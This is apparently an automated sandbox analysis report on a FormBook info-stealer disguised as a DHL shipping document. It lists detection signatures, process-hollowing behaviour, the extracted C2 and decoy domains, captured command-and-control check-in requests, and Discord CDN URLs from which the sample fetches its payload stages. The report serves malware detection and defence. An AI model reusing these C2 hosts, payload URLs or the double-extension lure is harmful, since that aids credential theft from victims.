Windows Analysis Report DHL AWB# 4AB19037XXX.pdf.exe

Overview

General Information

Sample Name: DHL AWB# 4AB19037XXX.pdf.exe
Analysis ID: 491716
MD5: 690684b6b6a432ef5f8b34b67653d4be
SHA1: 34b072cdd785e0be9bf9717707a72c122ebf8e93
SHA256: 2ea667119c0aeda764dcb53a2adf480a26985bfc682949d0fb0c02d266342c68
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • DHL AWB# 4AB19037XXX.pdf.exe (PID: 4532 cmdline: 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe' MD5: 690684B6B6A432EF5F8B34B67653D4BE)
    • conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 3672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 5456 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • chkdsk.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dependablelawnsnow.com/o4um/"], "decoy": ["kagami-belt.com", "k7e.xyz", "slowcontentmarketing.com", "nativeamericannurse.com", "stadtquartier.xyz", "vietlinkmart.com", "numisme.xyz", "lypp-sh.com", "walkerwaughray.com", "homerightsolutions.com", "vpdd.top", "857741.com", "informednewsreader.com", "misachoavien.com", "aslanrefinedhomes.com", "bjhaitaoshop.com", "lb-fo.com", "shadedfaetattoos.com", "tallulahapp.com", "amhonlinemarketing.com", "rotatingenergy.com", "alabeocopra.quest", "clublebron.com", "maximumbahis240.com", "muskegostorageco.com", "arendayouaccfb.online", "zjgker.com", "crux-at.com", "printsofthecitypgh.com", "rishisinghlaw.com", "thera.xyz", "winiarnia.net", "qq8.space", "houseofidiots.com", "motherhood-diaries.com", "asasaul.top", "3dotshub.com", "laliinparfumeri.com", "raywhiteinc.com", "lighterthanlight.net", "themshirt.com", "falbkugel.quest", "francissoba.com", "shopgraciadivina.com", "wakelust.online", "thatsthailand.com", "beeosum.com", "anushreehomemadeproducts.online", "gzmeijuan.com", "wipegorgeous.com", "nexteventtnpasumo3.xyz", "molitransport.com", "aquitemtijolo.com", "noun-bug.com", "myopportunity.online", "supermuschina.com", "thepatrioteffect.com", "zioholdings.com", "gordonhalecpas.com", "vestindocomamor.com", "redrockaccommodation.online", "thepostres.online", "hometech-bosch.xyz", "indowinjp.com"]}

Yara Overview

Memory Dumps

Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

Source: 6.2.RegAsm.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 6.2.RegAsm.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe' , ParentImage: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe, ParentProcessId: 4532, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3672
Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe' , ParentImage: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe, ParentProcessId: 4532, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3672

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: DHL AWB# 4AB19037XXX.pdf.exe, Virustotal: Detection: 33%
Source: DHL AWB# 4AB19037XXX.pdf.exe, ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match, File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: DHL AWB# 4AB19037XXX.pdf.exe, Joe Sandbox ML: detected
Source: 6.2.RegAsm.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL AWB# 4AB19037XXX.pdf.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown, HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49739 version: TLS 1.0
Source: DHL AWB# 4AB19037XXX.pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ediskcz.pdb source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
          Source: Binary string: ediskcz.pdbh; source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.416441384.0000000002DAF000.00000040.00000001.sdmp, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp
          Source: Binary string: c:\Users\Administrator\Desktop\44.pdbTBnB `B_CorExeMainmscoree.dll source: DHL AWB# 4AB19037XXX.pdf.exe
          Source: Binary string: wntdll.pdb source: RegAsm.exe, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
          Source: Binary string: c:\Users\Administrator\Desktop\44.pdb source: DHL AWB# 4AB19037XXX.pdf.exe
          Source: Binary string: RegAsm.pdb4 source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe, Code function: 4x nop then jmp 00007FFC07D70B86h

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 178.254.0.81:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 178.254.0.81:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 178.254.0.81:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49842 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49842 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49842 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 185.15.197.14 80
Source: C:\Windows\explorer.exe, Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe, Domain query: www.qq8.space
Source: C:\Windows\explorer.exe, Domain query: www.anushreehomemadeproducts.online
Source: C:\Windows\explorer.exe, Network Connect: 178.254.0.81 80
Source: C:\Windows\explorer.exe, Domain query: www.dependablelawnsnow.com
Source: C:\Windows\explorer.exe, Domain query: www.thera.xyz
Source: C:\Windows\explorer.exe, Domain query: www.laliinparfumeri.com
Source: C:\Windows\explorer.exe, Network Connect: 104.21.5.62 80
Source: C:\Windows\explorer.exe, Domain query: www.bjhaitaoshop.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Domain query: www.lighterthanlight.net
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.thera.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.dependablelawnsnow.com/o4um/
Source: Joe Sandbox View, ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic, HTTP traffic detected: GET /attachments/890478905998331907/891784228721807420/bin.pdf HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1 Host: cdn.discordapp.com
Source: global traffic, HTTP traffic detected: GET /o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.laliinparfumeri.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.lighterthanlight.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.dependablelawnsnow.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.anushreehomemadeproducts.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1 Host: www.thera.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View, IP Address: 52.58.78.16 52.58.78.16
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown, Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 27 Sep 2021 18:38:38 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.317912811.000000001BFB0000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp, String found in binary or memory: http://www.thera.xyz
Source: chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp, String found in binary or memory: http://www.thera.xyz/
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp, String found in binary or memory: https://cdn.discordapp.com
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314671886.0000000002ECA000.00000004.00000001.sdmp, String found in binary or memory: https://cdn.discordapp.com/attachments/889935662827044904/889981640498090054/runpe.pdf
Source: DHL AWB# 4AB19037XXX.pdf.exe, String found in binary or memory: https://cdn.discordapp.com/attachments/890478905998331907/891784228721807420/bin.pdf
Source: unknown, DNS traffic detected: queries for: cdn.discordapp.com

          E-Banking Fraud:

Yara detected FormBook

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: DHL AWB# 4AB19037XXX.pdf.exe
          Source: DHL AWB# 4AB19037XXX.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
